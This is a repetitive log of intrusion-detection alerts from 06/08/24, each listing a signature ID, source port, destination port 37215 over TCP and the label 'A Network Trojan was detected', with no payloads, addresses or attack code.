          Timestamp:06/08/24-15:05:08.099384
          SID:2835222
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469053
          SID:2835222
          Source Port:60840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510822
          SID:2835222
          Source Port:44310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044311
          SID:2829579
          Source Port:51238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888343
          SID:2829579
          Source Port:34266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111115
          SID:2835222
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159163
          SID:2835222
          Source Port:35560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448684
          SID:2829579
          Source Port:55868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.915166
          SID:2835222
          Source Port:54868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853069
          SID:2835222
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161564
          SID:2829579
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114097
          SID:2835222
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441001
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160549
          SID:2835222
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353574
          SID:2835222
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834448
          SID:2835222
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153452
          SID:2835222
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107292
          SID:2835222
          Source Port:35792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239845
          SID:2835222
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354112
          SID:2835222
          Source Port:55520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038891
          SID:2829579
          Source Port:38352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891753
          SID:2829579
          Source Port:37606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109000
          SID:2835222
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551576
          SID:2829579
          Source Port:54222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153611
          SID:2835222
          Source Port:41634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166723
          SID:2829579
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188748
          SID:2829579
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471501
          SID:2829579
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153108
          SID:2829579
          Source Port:33310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114650
          SID:2835222
          Source Port:47032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355594
          SID:2835222
          Source Port:46234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897876
          SID:2829579
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604183
          SID:2829579
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515535
          SID:2835222
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735122
          SID:2829579
          Source Port:34848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403716
          SID:2835222
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911255
          SID:2829579
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495901
          SID:2829579
          Source Port:44252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735023
          SID:2829579
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240300
          SID:2829579
          Source Port:53278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542976
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513830
          SID:2835222
          Source Port:39438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043042
          SID:2829579
          Source Port:56824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741625
          SID:2835222
          Source Port:42606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819214
          SID:2835222
          Source Port:43792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739917
          SID:2835222
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356294
          SID:2835222
          Source Port:42092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786710
          SID:2829579
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134261
          SID:2829579
          Source Port:40964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154152
          SID:2835222
          Source Port:39042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791678
          SID:2835222
          Source Port:52796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174631
          SID:2835222
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747882
          SID:2829579
          Source Port:42152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075707
          SID:2835222
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115700
          SID:2835222
          Source Port:34218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789171
          SID:2829579
          Source Port:57876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175553
          SID:2829579
          Source Port:41942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781669
          SID:2829579
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405185
          SID:2835222
          Source Port:43514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733880
          SID:2835222
          Source Port:50632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022180
          SID:2829579
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729283
          SID:2829579
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402618
          SID:2829579
          Source Port:49978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183986
          SID:2829579
          Source Port:47384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462277
          SID:2835222
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745440
          SID:2835222
          Source Port:58914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158943
          SID:2835222
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130775
          SID:2835222
          Source Port:35952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781043
          SID:2829579
          Source Port:54830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112375
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2835222
          Source Port:47326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178860
          SID:2829579
          Source Port:40446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783187
          SID:2835222
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792553
          SID:2829579
          Source Port:34862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275629
          SID:2835222
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041340
          SID:2835222
          Source Port:38530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895989
          SID:2835222
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912830
          SID:2835222
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600754
          SID:2835222
          Source Port:60076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445003
          SID:2829579
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510943
          SID:2829579
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509405
          SID:2829579
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708582
          SID:2835222
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016153
          SID:2835222
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888167
          SID:2835222
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270636
          SID:2835222
          Source Port:34498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672941
          SID:2835222
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025858
          SID:2835222
          Source Port:56422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883800
          SID:2829579
          Source Port:48716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462102
          SID:2835222
          Source Port:48822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855111
          SID:2835222
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740683
          SID:2829579
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912981
          SID:2835222
          Source Port:38186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470336
          SID:2835222
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166485
          SID:2829579
          Source Port:34390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395697
          SID:2829579
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2835222
          Source Port:48632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743668
          SID:2835222
          Source Port:54624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901544
          SID:2835222
          Source Port:59530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378415
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742600
          SID:2829579
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112014
          SID:2829579
          Source Port:37280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116464
          SID:2829579
          Source Port:44002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860188
          SID:2829579
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350628
          SID:2829579
          Source Port:50834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406330
          SID:2829579
          Source Port:47246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135473
          SID:2829579
          Source Port:55872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352895
          SID:2829579
          Source Port:38864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355641
          SID:2835222
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237287
          SID:2829579
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859990
          SID:2829579
          Source Port:47472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744123
          SID:2829579
          Source Port:48810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150204
          SID:2835222
          Source Port:49718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108321
          SID:2835222
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005789
          SID:2835222
          Source Port:53700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014799
          SID:2829579
          Source Port:59418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354796
          SID:2835222
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787821
          SID:2835222
          Source Port:53282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791948
          SID:2835222
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806732
          SID:2835222
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303134
          SID:2829579
          Source Port:34224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155150
          SID:2829579
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055204
          SID:2835222
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783753
          SID:2835222
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356521
          SID:2829579
          Source Port:36636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517672
          SID:2829579
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894991
          SID:2835222
          Source Port:43712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081704
          SID:2829579
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445879
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057760
          SID:2829579
          Source Port:50246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706957
          SID:2829579
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351775
          SID:2835222
          Source Port:51362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126044
          SID:2829579
          Source Port:55440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850584
          SID:2835222
          Source Port:36020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813491
          SID:2829579
          Source Port:49924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461227
          SID:2835222
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135928
          SID:2829579
          Source Port:59172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378446
          SID:2835222
          Source Port:52332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818970
          SID:2829579
          Source Port:33680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179966
          SID:2829579
          Source Port:56656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599926
          SID:2829579
          Source Port:41830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449219
          SID:2829579
          Source Port:60820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911663
          SID:2829579
          Source Port:45248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174473
          SID:2829579
          Source Port:36810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037989
          SID:2829579
          Source Port:55262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039289
          SID:2829579
          Source Port:60558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897779
          SID:2835222
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549351
          SID:2835222
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179225
          SID:2829579
          Source Port:38088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460812
          SID:2835222
          Source Port:50238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799253
          SID:2829579
          Source Port:51014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745857
          SID:2829579
          Source Port:60642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262346
          SID:2829579
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269309
          SID:2829579
          Source Port:45632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055370
          SID:2835222
          Source Port:46946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442469
          SID:2829579
          Source Port:34300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555154
          SID:2829579
          Source Port:56852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789076
          SID:2835222
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039369
          SID:2835222
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709734
          SID:2835222
          Source Port:47852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797998
          SID:2835222
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466905
          SID:2835222
          Source Port:52376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446565
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797557
          SID:2829579
          Source Port:54980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858407
          SID:2835222
          Source Port:37032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739615
          SID:2829579
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268598
          SID:2829579
          Source Port:39014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177322
          SID:2835222
          Source Port:55310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812844
          SID:2835222
          Source Port:33948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107959
          SID:2829579
          Source Port:37862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601778
          SID:2829579
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447006
          SID:2835222
          Source Port:43660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552444
          SID:2835222
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670059
          SID:2829579
          Source Port:52100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789088
          SID:2835222
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792933
          SID:2835222
          Source Port:41242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670420
          SID:2829579
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155388
          SID:2829579
          Source Port:52432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668102
          SID:2835222
          Source Port:36594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407206
          SID:2835222
          Source Port:36464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014591
          SID:2835222
          Source Port:48404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266060
          SID:2829579
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548704
          SID:2829579
          Source Port:36668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741102
          SID:2835222
          Source Port:34040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466264
          SID:2835222
          Source Port:38298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447143
          SID:2835222
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739814
          SID:2835222
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152527
          SID:2829579
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099161
          SID:2835222
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269831
          SID:2829579
          Source Port:41026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517018
          SID:2829579
          Source Port:52532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153573
          SID:2829579
          Source Port:34904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159661
          SID:2835222
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911727
          SID:2835222
          Source Port:41670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703613
          SID:2829579
          Source Port:38906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396889
          SID:2829579
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669668
          SID:2835222
          Source Port:49370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747984
